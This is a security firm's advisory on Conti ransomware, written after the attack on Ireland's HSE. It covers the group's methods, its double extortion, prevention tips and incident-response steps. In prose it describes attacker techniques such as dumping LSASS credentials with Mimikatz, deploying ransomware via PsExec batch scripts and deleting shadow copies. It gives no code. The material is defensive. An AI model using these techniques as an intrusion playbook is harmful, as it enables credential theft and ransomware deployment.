Conti Ransomware: Facts, Figures and Advice
On Friday, 14th May, Conti ransomware hit the HSE (Health Service Executive) forcing them to shut down all of their IT systems, which still remain down as of today, Monday, 17th May. The outage has led to widespread disruption in Ireland’s healthcare system causing limited access to diagnostics and medical records and slow response times. The ransomware group have demanded a ransom of $20 million but the HSE have not yet advised whether they will be engaging with the hackers or not.
Ronan Murphy, CEO of Smarttech247 said “A year ago, a back-up system was seen as a reasonable security measure against these incidents – but the blackmail situations surrounding the threat to leak information is a completely different scenario and one that is extremely difficult to tackle”
What we know about Conti
Conti ransomware is believed to be run by a Russian based cybercrime group known as Wizard Spider. This group uses phishing attacks to install TrickBot and BazarLoader trojans that provide remote access to the infected machine or machines. Then then use this remote access to spread laterally through the network while stealing credentials and harvesting unencrypted data that is stored on workstations and servers. Once they have stolen everything of value and gained access to Windows domain credentials, they wait – during this time they will remain undetected, until they strike and deploy the ransomware on the network to encrypt all of its devices. The Conti gang then use the stolen data as leverage forcing the victim to pay the ransom.
Conti is seen as a more sophisticated ransomware type because it is a “double-extortion” ransomware. In other words, where traditional ransomware encrypts files on a computer or system and then unlocks them when a ransom is paid, Conti additionally exfiltrates the data. As a result, the stolen data can then be used to demand a further ransom in exchange for not publishing the data on the dark web.
The original Conti is also a human-operated virus, meaning that rather than automatically worming its way into a system, it can be manipulated by humans.
Some high-profile ransomware attacks conducted by Conti in the past include FreePBX developer Sangoma, IoT chip maker Advantech, Broward County Public Schools (BCPS), and the Scottish Environment Protection Agency (SEPA). The hit on the Scottish Environment Protection Agency (SEPA) took place on Christmas Eve, later publishing roughly 1.2 GB of stolen data on their dark web leak site. Our researchers have noted that the Conti News site has published data stolen from at least 180 victims thus far.
What our IR & forensics team have observed:
The Smarttech247 team have observed an increase rate of ransomware attacks during the last few months. There are a small number of ransomware families that target the local network to encrypt via SMB. Conti’s unique feature is that it allows command line arguments to direct it to encrypt the local hard drive or network shares, even specific, targeted, IP addresses. Conti has an extremely busy and loud methodology for stopping services and inhibiting recovery on the local system. While many ransomware families will simply delete the Windows Volume Shadow Copies using vssadmin, Conti uses vssadmin in unique ways to ensure their deletion.
Additionally, the malware will execute 160 individual commands – 146 of which focused on stopping potential Windows services. The entirety of commands greatly mimics those that are also found within the Ryuk ransomware family.
Conti also abuses Windows Restart Manager to close applications and services currently running to make them available for encryption to maximize the damage. Once the system has been prepared and files have been identified, Conti will begin the process of scanning through each folder and start encrypting files with AES-256 encryption via a hard-coded public key, creating a ransom note named CONTI_README.txt, and encrypting files to have a file extension of “. CONTI. The use of a hard-coded key allows the malware to encrypt files even if the malware can’t contact its C2.
Overall, Conti represents a unique twist in modern ransomware. There have been tracked by numerous families that are designed to be driven by the adversary while on the network, with access gained through weak RDP access or vulnerable Internet-facing services. Conti shows an intention behind the actor to also respond to reconnaissance to determine worthwhile servers in the environment that are sensitive to data encryption. It is implementation of multi-threaded processing, as well as the use of the Windows Restart Manager, shows a feature of incredibly quick, and thorough, encryption of data. The use of large-scale service termination supports this with a focus on targeting a vast array of applications that can be found across the small business and enterprise fields.
Contibest practice recommendations:
- Monitor your network security 24/7 and be aware of the early indicators of attack
- Shut down internet-facing remote desktop protocol (RDP) to deny cybercriminals access to networks. If you need access to RDP, put it behind a VPN connection and enforce the use of Multi-Factor Authentication (MFA)
- Educate employees on what to look out for in terms of phishing and malicious spam
- Introduce robustsecurity policies
- Keep regular backups of your most important and current data on an offline storage device. The standard recommendation for backups is to follow the 3-2-1 method: 3 copies of the data, using 2 different systems, 1 of which is offline.
- Prevent attackers from getting access to and disabling your security: choose an advanced solution with a cloud-hosted management console with multi-factor authentication enabled and Role Based Administration to limit access rights.
- Have an effective Incident Response plan in place and make sure it is up-to-date.
If you are affected, we recommend the following actions be taken immediately:
The first thing you need to do is determine whether the attack is still underway. If you suspect it is, and you do not have the tools in place to stop it, determine which devices have been impacted and isolate them immediately. The easiest option is to simply unplug the network cable or turn off the Wi-Fi adapter. If the damage is more widespread than a few devices, consider doing this at the switch level and taking entire network segments offline instead of individual devices. Only shut down devices if you cannot disconnect the network.
Assess the damage:
- Which endpoints, servers and operating systems were affected, what has been lost?
- Are your backups still intact or has the attacker deleted them? If they are intact, make an offline copy immediately.
- Which machines were protected? Critical in getting you back on your feet.
Lastly, you will want to talk to people about what is happening, but the attackers may be eavesdropping so do not use your normal channels of communication. If the intruders have been in your network for a while, they will probably have access to email etc.
Find the root cause of the attack:
- The attackers have most likely been on your network for a few days or even weeks. Conti ransomware is operated by humans. They take time to prepare to ensure maximum disruption because this enables them to charge higher ransoms.
- The attackers could use a variety of different methods to break in your network. Possible initial access methods for Conti ransomware include, but are not limited to vulnerable firewalls, exposed RDP (Remote Desktop Protocol) services, and phishing user credentials via spam emails. Sites like Shodan.io provide insight into what an attacker could find out about your network; try using it to search your external IP addresses.
- They will have secured access to domain admin accounts as well as other user accounts. Attackers typically compromise multiple accounts during an attack. Their main goal is to get access to domain admin accounts that can be used to launch the ransomware. However, they also target specific admin accounts that have access to sensitive data, backup systems, and security management consoles.Conti attackers often use tools like Mimikatz, which can capture information from a running Microsoft LSASS.exe process that contains usernames/password hashes of currently logged on users. Sometimes attackers will leave this running and then deliberately break something on the machine that they have targeted, provoking an admin to log in to fix it. Attackers can then capture this admin’s credentials. If Mimikatz is blocked by security software, the attackers may instead use something like Microsoft Process Monitor to do a memory dump of LSASS.exe and take that dump file back to their machine to extract the information with Mimikatz. With Mimikatz, it does not matter how long or complex the passwords are because it is takes them straight out of memory.
- The hackers will have scanned your network. They know how many servers and endpoints you have and where you keep your backups, business-critical data, and applications. One of the first things attackers will do when they get onto a network is identify what access they have on the local machine. The next step is to find out what remote machines exist and if they can access them. Attackers use legitimate network scanners like “Advanced Port Scanner” and “Angry IP Scanner” due to their effectiveness and the fact that they are unlikely to be blocked. These scanners will generate a list of IPs and machine names. This makes it easy for attackers to focus on critical infrastructure as most organizations helpfully give their servers descriptive names, for example NY-DC1 for the New York Domain Controller, or maybe even simpler names like “FileServer01,” “Backup_Server,” etc.
- The attackers are likely to have downloaded and installed backdoors that allow them to come and go on your network and install additional tools. They will have set up folders and directories to collect and store stolen information and channels for communicating with the attackers and for moving information out of your network. The backdoors come in a variety of forms. Some just communicate back to the attackers’ IP address, allowing them to send and receive commands to the machine. Many backdoors are classified as legitimate applications. For example, the attackers might use Remote Administration tools such as RDP to maintain access. Even if RDP is disabled by default, it is very easy for an attacker with admin access to the machine to re-enable it. Some attackers, including Conti, also set up Tor proxies so they can send command-and-control traffic over the Tor network. Such activity is often very hard to spot.
- In addition to the encryption of data and disruption to software and operations, Conti operators will try to exfiltrate hundreds of gigabytes of corporate data prior to the main ransomware event. Targets are threatened with the risk of their data being published on a so-called “leak site” for anybody to download unless they pay the ransom. Some of the more valuable data is often sold to other attackers to use in further attacks. Once a file server is identified, attackers often use a tool called “Everything” that enables very fast file searching for keywords, for example “account,” “confidential,” “Social Security number.” After they identify the data, there are numerous methods the attackers can use to steal it.
- They will have tried to encrypt, delete, reset, or uninstall your backups. Unless your backups are stored offline, they are within reach of the attackers. A “backup” that is online and available all the time is just a second copy of the files waiting to be encrypted.
- The attackers will have tried to identify what security solution is used on the network and whether they can disable it. It does not matter how good your protection is if the attacker can turn it off. Attackers also try to find and gain access to the management consoles of more advanced security solutions to disable all protection just before they launch the ransomware.Security management consoles hosted locally are especially at risk as attackers could access them with the accounts they have already compromised.
- The most visible part of the attack – the release of ransomware – probably took place when no IT admins or security professionals were online to notice and prevent the lengthy process of file encryption, possibly during the middle of the night or during the weekend. Note: The encryption process takes hours. An encrypted Windows endpoint will have tens or hundreds of thousands of encrypted files by the time the ransomware is done. For large fileservers this could run into the millions. Therefore most targeted ransomware attacks are launched in the middle of the night, over a weekend or on a holiday, when fewer people are watching.Up to this point, the attackers have been trying to stay hidden, but here their tactics change. They want you to know they are there and what they have done. They want you to see how much data has been lost and to understand that someone has done this maliciously and now they want a payment to decrypt the data. Therefore, in almost all ransomware attacks, encrypted files will have had a new extension name appended to the end of the file. For example, “MyReport.docx” might become “MyReport.docx.encrypted.” The ransom notes are often displayed prominently in multiple places, adding to the chaos and stress.
- The ransomware will have been deployed to all your endpoints and any servers that were online at the time of attack – providing that is what the attacker wanted. The ransomware can be deployed in a variety of ways. One of the most common way Sophos experts see is a combination of batch scripts and the Microsoft PsExec tool, which is a great tool for executing commands on remote machines. An attacker might create a batch script that loops through a list of your IP addresses, using PsExec to copy the ransomware to each machine and then execute it.
- The launch of the ransomware is not the end. Using the backdoors, they set up during the preparation stage, the attackers will often continue to monitor the situation and even your email communications to see how you respond. An email to the CEO stating you will be OK because they did not encrypt the backups on Server X, could be a disaster if the attacker read it and still had access to that server. The attacker may also wait until you recover to then launch a second attack to really emphasize that they can keep doing this until you pay.
- The time spent in your network will likely have allowed the attackers to steal business-critical, sensitive, and confidential information that they now threaten to publicly expose. Some attackers also apply emotional pressures, with direct employee appeals and threats over email and phone. Most attackers will start publishing stolen data anywhere from a few days to a week after the main attack if no contact from the target is received or the negotiations breakdown. However, it could be several weeks or even longer before anything gets published.
Remember: While the attackers may promise to delete your information if you pay, you have no guarantees that they will.
Please reach out to us for a full list of IOCs and more information: email@example.com